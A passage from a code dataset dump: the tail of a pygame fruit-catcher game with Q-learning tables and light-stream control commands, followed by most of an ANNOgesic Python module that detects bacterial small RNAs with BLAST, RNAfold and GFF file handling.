\"right\")\n\n if self.is_Q_learning_AI == True:\n num_heights = 4\n num_fruit_x = 3\n num_pad_x = 7\n\n pad_x_bounds = []\n for i in range(num_pad_x):\n pad_x_bounds.append(self.width / num_pad_x * (i))\n fruit_height_bounds = []\n for j in range(num_heights):\n fruit_height_bounds.append(self.height / num_pad_x * (j))\n\n num_states = num_heights * num_fruit_x * num_pad_x\n num_actions = 8 # light streams\n self.R = np.zeros([num_states, num_actions])\n self.Q = np.zeros([num_states, num_actions])\n GAMMA = 0.8\n\n self.init_R_table(self.R)\n\n if self.fruit_init_x < 480:\n self.game._action_single_screen(40, \"left\")\n else:\n self.game._action_single_screen(40, \"right\")\n\n if self.getGameState()[\"fruit0_y\"] == 0:\n # if self.fruit_init_x < 430:\n # token = self.fruit_init_x\n # self.reset_fruit_param(percent_round_int(self.screen_width, 0.5))\n # self.fruit_init_x = token\n # elif self.fruit_init_x == 430:\n # token = self.fruit_init_x\n # self.reset_fruit_param(percent_round_int(self.screen_width, 0.25))\n # self.fruit_init_x = token\n # elif self.fruit_init_x > 430:\n # token = self.fruit_init_x\n # self.reset_fruit_param(percent_round_int(self.screen_width, 0.5))\n # self.fruit_init_x = token\n pass\n\n # time.sleep(0.001) #for slowing down the fps\n\n # 
self.fruit1.draw(self.screen)\n        # self.fruit2.draw(self.screen)\n\n    # def _action_lightStream_map(self, action,action_list,angle_speed_list):\n    def _action_lightStream_map(self, angle_speed,group_num):\n        # angle_speed = 0\n        self._sender.send(\"params\", 1, \"hDirection\", \"left\")\n        self._sender.send(\"params\", 2, \"hDirection\", \"right\")\n        self._sender.send(\"start_right\")\n        self._sender.send(\"start_left\")\n        #acquire: speed, group_num\n        # for i in range(0,8):\n        #     if angle_speed = angle_speed_list[i]:\n        # if angle_speed < 0:\n        #     group_num = 1 #left group\n        #     angle_speed = abs(angle_speed)\n        if group_num == 1:\n            self._sender.send(\"restore_left\")\n            self._sender.send(\"params\", group_num, \"hSpeed\", angle_speed)\n            self._sender.send(\"off_right\")\n        # else:\n        #     group_num = 2 #right group\n        #     angle_speed = abs(angle_speed)\n        if group_num == 2:\n            self._sender.send(\"restore_right\")\n            self._sender.send(\"params\", group_num, \"hSpeed\", angle_speed)\n            self._sender.send(\"off_left\")\n        # angle_speed = abs(angle_speed)\n\n    def _action_single_screen(self,angle_speed,direction):\n        # if self.is_RL_to_send:\n        if direction == \"left\" or direction ==\"right\":\n            self._sender.send(\"params\", 1, \"hDirection\", direction)\n            # self._sender.send(\"params\", 2, \"hDirection\", direction)\n            self._sender.send(\"params\", 1, \"hSpeed\", angle_speed)\n            # self._sender.send(\"params\", 2, \"hSpeed\", angle_speed)\n            # self._sender.send(\"start_right\")\n            # self._sender.send(\"restore_right\")\n            self._sender.send(\"start_left\")\n            # self._sender.send(\"restore_left\")\n        elif direction == \"reset_all\":\n            # self._sender.send(\"reset_right\")\n            self._sender.send(\"reset_left\")\n        elif direction == \"stop_all\":\n            # self._sender.send(\"stop_right\")\n            self._sender.send(\"stop_left\")\n\n    def _setAction(self, action, last_action):\n        \"\"\"\n        Pushes the action to the pygame event queue.\n        \"\"\"\n        if action is None:\n            action = self.NOOP\n\n        if last_action is None:\n            last_action = self.NOOP\n\n        curr_ac_num = pygame.event.Event(self.CUR_ACTION, idx= action)\n        last_ac_num = pygame.event.Event(self.LAST_ACTION, idx=last_action)\n\n        pygame.event.post(curr_ac_num)\n        pygame.event.post(last_ac_num)\n\n    def get_states(self,string):\n        game_states = {\n            \"player_x\": self.player.rect.center[0],\n            \"player_y\": self.player.rect.center[1],\n            \"player_vel\": self.player.vel,\n            \"fruit0_x\": self.fruit0.rect.center[0],\n            \"fruit0_y\": self.fruit0.rect.center[1],\n            \"to_update_text\": self.to_update_text,\n        }\n        return game_states[string]\n\n    def init_R_table(self,side_name):\n        self.reward = np.zeros([860, 18]) # rows(states): x-coord (1~860), cols(actions): light stream speed (5~90)\n        self.Q_table = np.zeros([860, 18])\n        self.Gamma = 0.8\n        # self.\n\n        # For left side, the left-mid point is considered the reward point\n        # For the right side, the right-mid point is considered the reward point\n        if side_name == \"left\":\n            for i in range (200,230): # 215 is the center, +15, -15 is the acceptable reward range\n                self.reward[i,:] = 10\n        if side_name == \"right\":\n            for j in range (630,660):\n                self.reward[j,:] = 10 # 645 is the center.\n\n    def update_Q_table(self,Q,R,state,action,next_state):\n        Q[state, action] = R[state, action] + self.Gamma * max(Q[next_state, :])\n        return Q\n\n    # def train_model(self):\n    #     pass\n\n    def draw_grid(self):\n        #draw grid lines:\n        line_color = 255, 200, 255\n        line_width = 2\n        line_gap = self.width / 8\n        #horizontal Line:\n        pygame.draw.line(self.screen, line_color, (0,int(self.height*2/8)),\n                         
(self.width,int(self.height*2/8)), line_width)\n\n for i in range(1,9):\n if i != 4:\n pygame.draw.line(self.screen, line_color, (line_gap*i, 0), (line_gap*i, self.height), line_width)\n\n","sub_path":"ple/games/catcher_discrete2.py","file_name":"catcher_discrete2.py","file_ext":"py","file_size_in_byte":20374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"306421738","text":"import os\nimport sys\nimport shutil\nfrom subprocess import call\nfrom annogesiclib.multiparser import Multiparser\nfrom annogesiclib.helper import Helper\nfrom annogesiclib.sRNA_intergenic import intergenic_srna\nfrom annogesiclib.sRNA_utr_derived import utr_derived_srna\nfrom annogesiclib.merge_sRNA import merge_srna_table, merge_srna_gff\nfrom annogesiclib.extract_sRNA_info import extract_energy, extract_blast\nfrom annogesiclib.plot_mountain import plot_mountain_plot\nfrom annogesiclib.sRNA_class import classify_srna\nfrom annogesiclib.gen_srna_output import gen_srna_table, gen_best_srna\nfrom annogesiclib.blast_class import blast_class\nfrom annogesiclib.compare_sRNA_sORF import srna_sorf_comparison\nfrom annogesiclib.change_db_format import change_format\nfrom annogesiclib.compare_srna_term import compare_srna_term\nfrom annogesiclib.compare_srna_promoter import compare_srna_promoter\nfrom annogesiclib.print_rank_all import print_rank_all\nfrom annogesiclib.sRNA_filter_frag import filter_frag\nfrom annogesiclib.sRNA_filter_min_utr import filter_utr\nfrom annogesiclib.sRNA_antisense import srna_antisense\nfrom annogesiclib.args_container import ArgsContainer\n\n\nclass sRNADetection(object):\n\n def __init__(self, args_srna):\n self.args_container = ArgsContainer()\n self.helper = Helper()\n self.multiparser = Multiparser()\n self.gff_output = os.path.join(args_srna.out_folder, \"gffs\")\n self.table_output = os.path.join(args_srna.out_folder, \"tables\")\n self.stat_path = os.path.join(args_srna.out_folder, \"statistics\")\n self.tss_path = self._check_folder_exist(args_srna.tss_folder)\n self.pro_path = self._check_folder_exist(args_srna.pro_folder)\n self.sorf_path = self._check_folder_exist(args_srna.sorf_file)\n self.fasta_path = os.path.join(args_srna.fastas, \"tmp\")\n self.tran_path = os.path.join(args_srna.trans, \"tmp\")\n self.term_path = self._check_folder_exist(args_srna.terms)\n self.merge_wigs = os.path.join(args_srna.out_folder, \"merge_wigs\")\n self.prefixs = {\"merge\": os.path.join(\n args_srna.out_folder, \"tmp_merge\"),\n \"utr\": os.path.join(\n args_srna.out_folder, \"tmp_utrsrna\"),\n \"normal\": os.path.join(\n args_srna.out_folder, \"tmp_normal\"),\n \"in_cds\": os.path.join(\n args_srna.out_folder, \"tmp_incds\"),\n \"merge_table\": os.path.join(\n args_srna.out_folder, \"tmp_merge_table\"),\n \"utr_table\": os.path.join(\n args_srna.out_folder, \"tmp_utrsrna_table\"),\n \"normal_table\": os.path.join(\n args_srna.out_folder, \"tmp_normal_table\"),\n \"in_cds_table\": os.path.join(\n args_srna.out_folder, \"tmp_incds_table\"),\n \"basic\": os.path.join(\n args_srna.out_folder, \"tmp_basic\"),\n \"energy\": os.path.join(\n args_srna.out_folder, \"tmp_energy\")}\n self.tmps = {\"nr\": os.path.join(args_srna.out_folder, \"tmp_nr\"),\n \"srna\": os.path.join(args_srna.out_folder, \"tmp_sRNA\")}\n self.best_table = os.path.join(self.table_output, \"best\")\n self.table_output = os.path.join(args_srna.out_folder, \"tables\")\n self.stat_path = os.path.join(args_srna.out_folder, \"statistics\")\n self.all_best = {\"all_gff\": 
os.path.join(\n self.gff_output, \"all_candidates\"),\n \"best_gff\": os.path.join(self.gff_output, \"best\"),\n \"all_table\": os.path.join(\n self.table_output, \"all_candidates\"),\n \"best_table\": os.path.join(self.table_output, \"best\")}\n\n def _check_folder_exist(self, folder):\n if folder is not None:\n path = os.path.join(folder, \"tmp\")\n else:\n path = None\n return path\n\n def _check_gff(self, gffs):\n for gff in os.listdir(gffs):\n if gff.endswith(\".gff\"):\n self.helper.check_uni_attributes(os.path.join(gffs, gff))\n\n def _run_format(self, blast_path, database, type_, db_file, err):\n call([os.path.join(blast_path, \"makeblastdb\"), \"-in\", database,\n \"-dbtype\", type_, \"-out\", db_file], stderr=err)\n\n def _formatdb(self, database, type_, out_folder,\n blast_path, database_type):\n err = open(os.path.join(out_folder, \"log.txt\"), \"w\")\n if (database.endswith(\".fa\")) or (\n database.endswith(\".fna\")) or (\n database.endswith(\".fasta\")):\n pass\n else:\n folders = database.split(\"/\")\n filename = folders[-1]\n folder = \"/\".join(folders[:-1])\n for fasta in os.listdir(folder):\n if (fasta.endswith(\".fa\")) or (\n fasta.endswith(\".fna\")) or (\n fasta.endswith(\".fasta\")):\n if \".\".join(fasta.split(\".\")[:-1]) == filename:\n database = os.path.join(folder, fasta)\n if database_type == \"sRNA\":\n change_format(database, \"tmp_srna_database\")\n os.remove(database)\n shutil.move(\"tmp_srna_database\", database)\n db_file = \".\".join(database.split(\".\")[:-1])\n self._run_format(blast_path, database, type_, db_file, err)\n err.close()\n\n def _merge_frag_tex_file(self, files, args_srna):\n if (args_srna.frag_wigs is not None) and (\n args_srna.tex_wigs is not None):\n self.helper.merge_file(files[\"frag_gff\"], files[\"tex_gff\"])\n self.helper.merge_file(files[\"frag_csv\"], files[\"tex_csv\"])\n shutil.move(files[\"tex_csv\"], files[\"merge_csv\"])\n self.helper.sort_gff(files[\"tex_gff\"], files[\"merge_gff\"])\n os.remove(files[\"frag_csv\"])\n os.remove(files[\"frag_gff\"])\n os.remove(files[\"tex_gff\"])\n elif (args_srna.frag_wigs is not None):\n shutil.move(files[\"frag_csv\"], files[\"merge_csv\"])\n self.helper.sort_gff(files[\"frag_gff\"], files[\"merge_gff\"])\n os.remove(files[\"frag_gff\"])\n elif (args_srna.tex_wigs is not None):\n shutil.move(files[\"tex_csv\"], files[\"merge_csv\"])\n self.helper.sort_gff(files[\"tex_gff\"], files[\"merge_gff\"])\n\n def _run_normal(self, prefix, gff, tran, fuzzy_tss, args_srna):\n if \"tmp_cutoff_inter\" in os.listdir(args_srna.out_folder):\n os.remove(os.path.join(args_srna.out_folder, \"tmp_cutoff_inter\"))\n files = {\"frag_gff\": None, \"frag_csv\": None,\n \"tex_gff\": None, \"tex_csv\": None,\n \"merge_gff\": None, \"merge_csv\": None}\n if (\"tss\" in args_srna.import_info):\n tss = self.helper.get_correct_file(self.tss_path, \"_TSS.gff\",\n prefix, None, None)\n else:\n tss = None\n if self.pro_path is not None:\n pro = self.helper.get_correct_file(\n self.pro_path, \"_processing.gff\", prefix, None, None)\n else:\n pro = None\n if args_srna.frag_wigs is not None:\n files[\"frag_gff\"] = os.path.join(\n args_srna.out_folder, \"_\".join([\"tmp_frag\", prefix]))\n files[\"frag_csv\"] = os.path.join(\n args_srna.out_folder, \"_\".join([\"tmp_frag_table\", prefix]))\n\n args_srna = self.args_container.container_intersrna(\n \"frag\", files, args_srna, prefix,\n os.path.join(args_srna.gffs, gff), tran, tss,\n pro, fuzzy_tss)\n intergenic_srna(args_srna)\n if args_srna.tex_wigs is not None:\n 
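# same intergenic detection as the frag branch above, run again over the tex wig libraries\n            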
files[\"tex_gff\"] = os.path.join(\n                args_srna.out_folder, \"_\".join([\"tmp_tex\", prefix]))\n            files[\"tex_csv\"] = os.path.join(\n                args_srna.out_folder, \"_\".join([\"tmp_tex_table\", prefix]))\n            args_srna = self.args_container.container_intersrna(\n                \"tex\", files, args_srna, prefix,\n                os.path.join(args_srna.gffs, gff), tran, tss,\n                pro, fuzzy_tss)\n            intergenic_srna(args_srna)\n        files[\"merge_csv\"] = \"_\".join([self.prefixs[\"normal_table\"], prefix])\n        files[\"merge_gff\"] = \"_\".join([self.prefixs[\"normal\"], prefix])\n        self._merge_frag_tex_file(files, args_srna)\n        if \"TSS_class\" in os.listdir(args_srna.out_folder):\n            tss = os.path.join(args_srna.out_folder,\n                               \"TSS_class\", prefix + \"_TSS.gff\")\n        return tss\n\n    def _run_utrsrna(self, gff, tran, prefix, tss, pro, args_srna):\n        if \"tmp_median\" in os.listdir(args_srna.out_folder):\n            os.remove(os.path.join(args_srna.out_folder, \"tmp_median\"))\n        files = {\"frag_gff\": None, \"frag_csv\": None,\n                 \"tex_gff\": None, \"tex_csv\": None,\n                 \"merge_gff\": None, \"merge_csv\": None}\n        if args_srna.tex_wigs is not None:\n            files[\"tex_gff\"] = os.path.join(\n                args_srna.out_folder, \"_\".join([\"tmp_utr_tex\", prefix]))\n            files[\"tex_csv\"] = os.path.join(\n                args_srna.out_folder,\n                \"_\".join([\"tmp_utr_tex_table\", prefix]))\n            args_srna = self.args_container.container_utrsrna(\n                os.path.join(args_srna.gffs, gff), tran, tss, files,\n                pro, os.path.join(self.fasta_path, prefix + \".fa\"),\n                \"tex\", prefix, args_srna)\n            utr_derived_srna(args_srna)\n        if args_srna.frag_wigs is not None:\n            files[\"frag_gff\"] = os.path.join(\n                args_srna.out_folder, \"_\".join([\"tmp_utr_frag\", prefix]))\n            files[\"frag_csv\"] = os.path.join(\n                args_srna.out_folder, \"_\".join([\"tmp_utr_frag_table\", prefix]))\n            args_srna = self.args_container.container_utrsrna(\n                os.path.join(args_srna.gffs, gff), tran, tss, files,\n                pro, os.path.join(self.fasta_path, prefix + \".fa\"),\n                \"frag\", prefix, args_srna)\n            utr_derived_srna(args_srna)\n        files[\"merge_csv\"] = \"_\".join([self.prefixs[\"utr_table\"], prefix])\n        files[\"merge_gff\"] = \"_\".join([self.prefixs[\"utr\"], prefix])\n        self._merge_frag_tex_file(files, args_srna)\n        filter_utr(files[\"merge_gff\"], files[\"merge_csv\"], args_srna.min_utr)\n\n    def _check_necessary_file(self, args_srna):\n        if (args_srna.gffs is None) or (args_srna.trans is None) or (\n                (args_srna.tex_wigs is None) and (\n                args_srna.frag_wigs is None)):\n            print(\"Error: lack required files!!!!\")\n            sys.exit()\n        if args_srna.utr_srna:\n            if (args_srna.tss_folder is None):\n                print(\"Error: lack required TSS files for UTR \"\n                      \"derived sRNA detection!!!!\")\n                sys.exit()\n            if (args_srna.pro_folder is None):\n                print(\"Warning: lack Processing site files for UTR \"\n                      \"derived sRNA detection!!!\")\n                print(\"it may affect the results!!!!\")\n        self._check_gff(args_srna.gffs)\n        self._check_gff(args_srna.trans)\n        if args_srna.tss_folder is not None:\n            self._check_gff(args_srna.tss_folder)\n            self.multiparser.parser_gff(args_srna.tss_folder, \"TSS\")\n            self.multiparser.combine_gff(args_srna.gffs, self.tss_path,\n                                         None, \"TSS\")\n        if args_srna.pro_folder is not None:\n            self._check_gff(args_srna.pro_folder)\n            self.multiparser.parser_gff(args_srna.pro_folder, \"processing\")\n            self.multiparser.combine_gff(args_srna.gffs, self.pro_path,\n                                         None, \"processing\")\n        if args_srna.sorf_file is not None:\n            self._check_gff(args_srna.sorf_file)\n            self.multiparser.parser_gff(args_srna.sorf_file, \"sORF\")\n            self.multiparser.combine_gff(args_srna.gffs, 
self.sorf_path,\n None, \"sORF\")\n if args_srna.utr_srna or (\"sec_str\" in args_srna.import_info) or (\n \"blast_nr\" in args_srna.import_info) or (\n \"blast_srna\" in args_srna.import_info):\n if args_srna.fastas is None:\n print(\"Error: lack required fasta files for UTR \"\n \"derived sRNA detection!!!!\")\n sys.exit()\n self.multiparser.parser_fasta(args_srna.fastas)\n self.multiparser.combine_fasta(args_srna.gffs,\n self.fasta_path, None)\n if args_srna.terms is not None:\n self._check_gff(args_srna.terms)\n self.multiparser.parser_gff(args_srna.terms, \"term\")\n self.multiparser.combine_gff(args_srna.gffs, self.term_path,\n None, \"term\")\n else:\n self.term_path = None\n\n def _run_program(self, args_srna):\n prefixs = []\n tss = None\n for gff in os.listdir(args_srna.gffs):\n if gff.endswith(\".gff\"):\n prefix = gff.replace(\".gff\", \"\")\n prefixs.append(prefix)\n print(\"Running sRNA detection of {0}....\".format(prefix))\n tran = self.helper.get_correct_file(\n self.tran_path, \"_transcript.gff\", prefix, None, None)\n gffs = {\"merge\": \"_\".join([self.prefixs[\"merge\"], prefix]),\n \"utr\": \"_\".join([self.prefixs[\"utr\"], prefix]),\n \"normal\": \"_\".join([self.prefixs[\"normal\"], prefix])}\n csvs = {\"merge\": \"_\".join([\n self.prefixs[\"merge_table\"], prefix]),\n \"utr\": \"_\".join([self.prefixs[\"utr_table\"], prefix]),\n \"normal\": \"_\".join([\n self.prefixs[\"normal_table\"], prefix])}\n tss = self._run_normal(\n prefix, gff, tran, args_srna.fuzzy_tsss[\"inter\"],\n args_srna)\n if args_srna.utr_srna:\n print(\"Running UTR derived sRNA detection of {0}\".format(\n prefix))\n if tss is None:\n tss = self.helper.get_correct_file(\n self.tss_path, \"_TSS.gff\", prefix, None, None)\n if self.pro_path is not None:\n pro = self.helper.get_correct_file(\n self.pro_path, \"_processing.gff\",\n prefix, None, None)\n else:\n pro = None\n if tss is not None:\n self._run_utrsrna(gff, tran, prefix,\n tss, pro, args_srna)\n self._merge_srna(args_srna, gffs, csvs, prefix,\n os.path.join(args_srna.gffs, gff), tss)\n filter_frag(csvs[\"merge\"], gffs[\"merge\"])\n self.helper.sort_gff(gffs[\"merge\"],\n \"_\".join([self.prefixs[\"basic\"], prefix]))\n return prefixs\n\n def _merge_srna(self, args_srna, gffs, csvs, prefix, gff_file, tss):\n print(\"merging data of intergenic and UTR_derived sRNA...\")\n merge_srna_gff(gffs, args_srna.in_cds,\n args_srna.cutoff_overlap, gff_file)\n merge_srna_table(gffs[\"merge\"], csvs, os.path.join(args_srna.wig_path,\n \"_\".join([prefix, \"forward.wig\"])),\n os.path.join(args_srna.wig_path,\n \"_\".join([prefix, \"reverse.wig\"])),\n tss, args_srna)\n\n def _run_RNAfold(self, seq_file, vienna_path, sec_file):\n os.system(\" \".join([\"cat\", seq_file, \"|\",\n os.path.join(vienna_path, \"RNAfold\"),\n \"-p\", \">\", sec_file]))\n\n def _get_seq_sec(self, fasta_path, out_folder, prefix, sec_path,\n dot_path, vienna_path):\n detect = False\n for fasta in os.listdir(fasta_path):\n if fasta.endswith(\".fa\") and (\n fasta.replace(\".fa\", \"\") == prefix):\n detect = True\n break\n if detect:\n detect = False\n seq_file = os.path.join(out_folder, \"_\".join([\"sRNA_seq\", prefix]))\n sec_file = os.path.join(out_folder, \"_\".join([\"sRNA_2d\", prefix]))\n self.helper.get_seq(\"_\".join([self.prefixs[\"basic\"], prefix]),\n os.path.join(fasta_path, fasta), seq_file)\n else:\n print(\"Error:There is not fasta file of {0}\".format(prefix))\n print(\"please check your imported information\")\n sys.exit()\n tmp_path = 
os.path.join(out_folder, \"tmp_srna\")\n self.helper.check_make_folder(tmp_path)\n main_path = os.getcwd()\n os.chdir(tmp_path)\n sec_file = os.path.join(main_path, sec_file)\n seq_file = os.path.join(main_path, seq_file)\n tmp_sec_path = os.path.join(main_path, sec_path)\n tmp_dot_path = os.path.join(main_path, dot_path)\n self._run_RNAfold(seq_file, vienna_path, sec_file)\n extract_energy(os.path.join(main_path,\n \"_\".join([self.prefixs[\"basic\"], prefix])),\n sec_file, os.path.join(main_path,\n \"_\".join([self.prefixs[\"energy\"], prefix])))\n for ps in os.listdir(os.getcwd()):\n new_ps = ps.replace(\"|\", \"_\")\n shutil.move(ps, new_ps)\n return {\"sec\": tmp_sec_path, \"dot\": tmp_dot_path, \"main\": main_path,\n \"tmp\": os.path.join(main_path, tmp_path)}\n\n def _run_replot(self, vienna_util, tmp_paths, file_, dot_file, rel_file):\n os.system(\" \".join([os.path.join(vienna_util, \"relplot.pl\"),\n os.path.join(tmp_paths[\"tmp\"], file_),\n os.path.join(tmp_paths[\"tmp\"], dot_file),\n \">\", os.path.join(tmp_paths[\"tmp\"], rel_file)]))\n\n def _convert_pdf(self, ps2pdf14_path, tmp_paths, file_, pdf_file):\n call([ps2pdf14_path, os.path.join(tmp_paths[\"tmp\"], file_), pdf_file])\n\n def _replot_sec_to_pdf(self, vienna_util, tmp_paths,\n ps2pdf14_path, prefix):\n for file_ in os.listdir(os.getcwd()):\n if file_.endswith(\"ss.ps\"):\n dot_file = file_.replace(\"ss.ps\", \"dp.ps\")\n rel_file = file_.replace(\"ss.ps\", \"rss.ps\")\n print(\"replot {0}\".format(file_))\n self._run_replot(vienna_util, tmp_paths, file_,\n dot_file, rel_file)\n for file_ in os.listdir(tmp_paths[\"tmp\"]):\n if (file_.endswith(\"rss.ps\")) or (file_.endswith(\"dp.ps\")):\n pdf_file = file_.replace(\".ps\", \".pdf\")\n print(\"convert {0} to pdf\".format(file_))\n self._convert_pdf(ps2pdf14_path, tmp_paths,\n file_, pdf_file)\n os.mkdir(os.path.join(tmp_paths[\"sec\"], prefix))\n os.mkdir(os.path.join(tmp_paths[\"dot\"], prefix))\n self.helper.move_all_content(\n tmp_paths[\"tmp\"], os.path.join(tmp_paths[\"sec\"], prefix),\n [\"rss.pdf\"])\n self.helper.move_all_content(\n tmp_paths[\"tmp\"], os.path.join(tmp_paths[\"dot\"], prefix),\n [\"dp.pdf\"])\n\n def _run_mountain(self, vienna_util, tmp_paths, dot_file, out):\n call([os.path.join(vienna_util, \"mountain.pl\"),\n os.path.join(tmp_paths[\"tmp\"], dot_file)], stdout=out)\n\n def _plot_mountain(self, mountain, moun_path,\n tmp_paths, prefix, vienna_util):\n if mountain:\n tmp_moun_path = os.path.join(tmp_paths[\"main\"], moun_path)\n os.mkdir(os.path.join(tmp_moun_path, prefix))\n txt_path = os.path.join(tmp_paths[\"tmp\"], \"tmp_txt\")\n self.helper.check_make_folder(txt_path)\n print(\"Generating mountain plot of {0}....\".format(prefix))\n for dot_file in os.listdir(tmp_paths[\"tmp\"]):\n if dot_file.endswith(\"dp.ps\"):\n moun_txt = os.path.join(tmp_paths[\"tmp\"], \"mountain.txt\")\n out = open(moun_txt, \"w\")\n moun_file = dot_file.replace(\"dp.ps\", \"mountain.pdf\")\n print(\"Generating {0}\".format(moun_file))\n self._run_mountain(vienna_util, tmp_paths, dot_file, out)\n plot_mountain_plot(moun_txt, moun_file)\n shutil.move(moun_file,\n os.path.join(tmp_moun_path, prefix, moun_file))\n out.close()\n os.remove(moun_txt)\n\n def _compute_2d_and_energy(self, args_srna, prefixs):\n print(\"Running energy calculation....\")\n moun_path = os.path.join(args_srna.out_folder, \"mountain_plot\")\n sec_path = os.path.join(args_srna.out_folder, \"sec_structure\",\n \"sec_plot\")\n dot_path = os.path.join(args_srna.out_folder, \"sec_structure\",\n 
\"dot_plot\")\n self.helper.remove_all_content(sec_path, None, \"dir\")\n self.helper.remove_all_content(dot_path, None, \"dir\")\n self.helper.remove_all_content(moun_path, None, \"dir\")\n for prefix in prefixs:\n tmp_paths = self._get_seq_sec(\n self.fasta_path, args_srna.out_folder, prefix, sec_path,\n dot_path, args_srna.vienna_path)\n self._replot_sec_to_pdf(args_srna.vienna_util, tmp_paths,\n args_srna.ps2pdf14_path, prefix)\n self._plot_mountain(args_srna.mountain, moun_path, tmp_paths,\n prefix, args_srna.vienna_util)\n self.helper.remove_all_content(os.getcwd(), \".ps\", \"file\")\n os.chdir(tmp_paths[\"main\"])\n shutil.move(\"_\".join([self.prefixs[\"energy\"], prefix]),\n \"_\".join([self.prefixs[\"basic\"], prefix]))\n shutil.rmtree(os.path.join(args_srna.out_folder, \"tmp_srna\"))\n\n def _run_blast(self, blast_path, program, database, e, seq_file,\n blast_file, strand):\n call([os.path.join(blast_path, program), \"-db\", database,\n \"-evalue\", str(e), \"-strand\", strand, \"-query\", seq_file,\n \"-out\", blast_file])\n\n def _get_strand_fasta(self, seq_file, out_folder):\n tmp_plus = os.path.join(out_folder, \"tmp_plus.fa\")\n tmp_minus = os.path.join(out_folder, \"tmp_minus.fa\")\n out_p = open(tmp_plus, \"w\")\n out_m = open(tmp_minus, \"w\")\n strand = \"\"\n with open(seq_file) as sh:\n for line in sh:\n line = line.strip()\n if line.startswith(\">\"):\n if line[-1] == \"+\":\n out_p.write(line + \"\\n\")\n strand = \"plus\"\n elif line[-1] == \"-\":\n out_m.write(line + \"\\n\")\n strand = \"minus\"\n else:\n if strand == \"plus\":\n out_p.write(line + \"\\n\")\n elif strand == \"minus\":\n out_m.write(line + \"\\n\")\n out_p.close()\n out_m.close()\n return tmp_plus, tmp_minus\n\n def _blast(self, database, database_format, data_type, args_srna,\n prefixs, program, database_type, e):\n if (database is None):\n print(\"Error: No database assigned!\")\n else:\n if database_format:\n self._formatdb(database, data_type, args_srna.out_folder,\n args_srna.blast_path, database_type)\n for prefix in prefixs:\n blast_file = os.path.join(\n args_srna.out_folder, \"blast_result_and_misc\",\n \"_\".join([database_type, \"blast\", prefix + \".txt\"]))\n srna_file = \"_\".join([self.prefixs[\"basic\"], prefix])\n out_file = os.path.join(\n args_srna.out_folder,\n \"_\".join([\"tmp\", database_type, prefix]))\n print(\"Running Blast of {0}\".format(prefix))\n seq_file = os.path.join(\n args_srna.out_folder, \"_\".join([\"sRNA_seq\", prefix]))\n if seq_file not in os.listdir(args_srna.out_folder):\n self.helper.get_seq(\n srna_file,\n os.path.join(self.fasta_path, prefix + \".fa\"),\n seq_file)\n if database_type == \"nr\":\n tmp_plus, tmp_minus = self._get_strand_fasta(\n seq_file, args_srna.out_folder)\n tmp_blast = os.path.join(\"tmp_blast.txt\")\n self._run_blast(args_srna.blast_path, program, database, e,\n tmp_plus, tmp_blast, \"plus\")\n self._run_blast(args_srna.blast_path, program, database, e,\n tmp_minus, blast_file, \"minus\")\n self.helper.merge_file(tmp_blast, blast_file)\n os.remove(tmp_blast)\n os.remove(tmp_plus)\n os.remove(tmp_minus)\n else:\n self._run_blast(args_srna.blast_path, program, database, e,\n seq_file, blast_file, \"both\")\n extract_blast(blast_file, srna_file, out_file,\n out_file + \".csv\", database_type)\n shutil.move(out_file, srna_file)\n\n def _class_srna(self, prefixs, args_srna):\n if (len(args_srna.import_info) != 1) or (\n len(args_srna.import_info) != 0):\n for prefix in prefixs:\n print(\"classifying sRNA of {0}\".format(prefix))\n 
class_gff = os.path.join(self.gff_output, \"for_class\")\n class_table = os.path.join(self.table_output, \"for_class\")\n self.helper.check_make_folder(os.path.join(class_table,\n prefix))\n self.helper.check_make_folder(os.path.join(class_gff, prefix))\n class_gff = os.path.join(class_gff, prefix)\n class_table = os.path.join(class_table, prefix)\n self.helper.check_make_folder(class_table)\n self.helper.check_make_folder(class_gff)\n out_stat = os.path.join(\n self.stat_path, \"_\".join([\n \"stat_sRNA_class\", prefix + \".csv\"]))\n classify_srna(os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])), class_gff,\n out_stat, args_srna)\n for srna in os.listdir(class_gff):\n out_table = os.path.join(\n class_table, srna.replace(\".gff\", \".csv\"))\n gen_srna_table(\n os.path.join(class_gff, srna),\n \"_\".join([self.prefixs[\"merge_table\"], prefix]),\n \"_\".join([self.tmps[\"nr\"], prefix + \".csv\"]),\n \"_\".join([self.tmps[\"srna\"], prefix + \".csv\"]),\n args_srna, out_table)\n\n def _get_best_result(self, prefixs, args_srna):\n for prefix in prefixs:\n best_gff = os.path.join(self.all_best[\"best_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"]))\n best_table = os.path.join(self.all_best[\"best_table\"],\n \"_\".join([prefix, \"sRNA.csv\"]))\n gen_best_srna(os.path.join(self.all_best[\"all_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])),\n best_gff, args_srna)\n gen_srna_table(os.path.join(self.all_best[\"best_gff\"],\n \"_\".join([prefix, \"sRNA.gff\"])),\n \"_\".join([self.prefixs[\"merge_table\"], prefix]),\n \"_\".join([self.tmps[\"nr\"], prefix + \".csv\"]),\n \"_\".join([self.tmps[\"srna\"], prefix + \".csv\"]),\n args_srna, best_table)\n\n def _remove_file(self, args_srna):\n self.helper.remove_all_content(args_srna.out_folder, \"tmp_\", \"dir\")\n self.helper.remove_all_content(args_srna.out_folder, \"tmp_\", \"file\")\n self.helper.remove_tmp(args_srna.fastas)\n self.helper.remove_tmp(args_srna.gffs)\n if args_srna.frag_wigs is not None:\n self.helper.remove_tmp(args_srna.frag_wigs)\n if args_srna.tex_wigs is not None:\n self.helper.remove_tmp(args_srna.tex_wigs)\n if (args_srna.frag_wigs is not None) and (\n args_srna.tex_wigs is not None):\n shutil.rmtree(args_srna.merge_wigs)\n self.helper.remove_tmp(args_srna.trans)\n if args_srna.tss_folder is not None:\n self.helper.remove_tmp(args_srna.tss_folder)\n if args_srna.pro_folder is not None:\n self.helper.remove_tmp(args_srna.pro_folder)\n if args_srna.sorf_file is not None:\n self.helper.remove_tmp(args_srna.sorf_file)\n if \"tmp_median\" in os.listdir(args_srna.out_folder):\n os.remove(os.path.join(args_srna.out_folder, \"tmp_median\"))\n if self.term_path is not None:\n self.helper.remove_tmp(args_srna.terms)\n\n def _filter_srna(self, args_srna, prefixs):\n if \"sec_str\" in args_srna.import_info:\n self._compute_2d_and_energy(args_srna, prefixs)\n if \"blast_nr\" in args_srna.import_info:\n self._blast(args_srna.nr_database, args_srna.nr_format, \"prot\",\n args_srna, prefixs, \"blastx\", \"nr\", args_srna.e_nr)\n if \"blast_srna\" in args_srna.import_info:\n 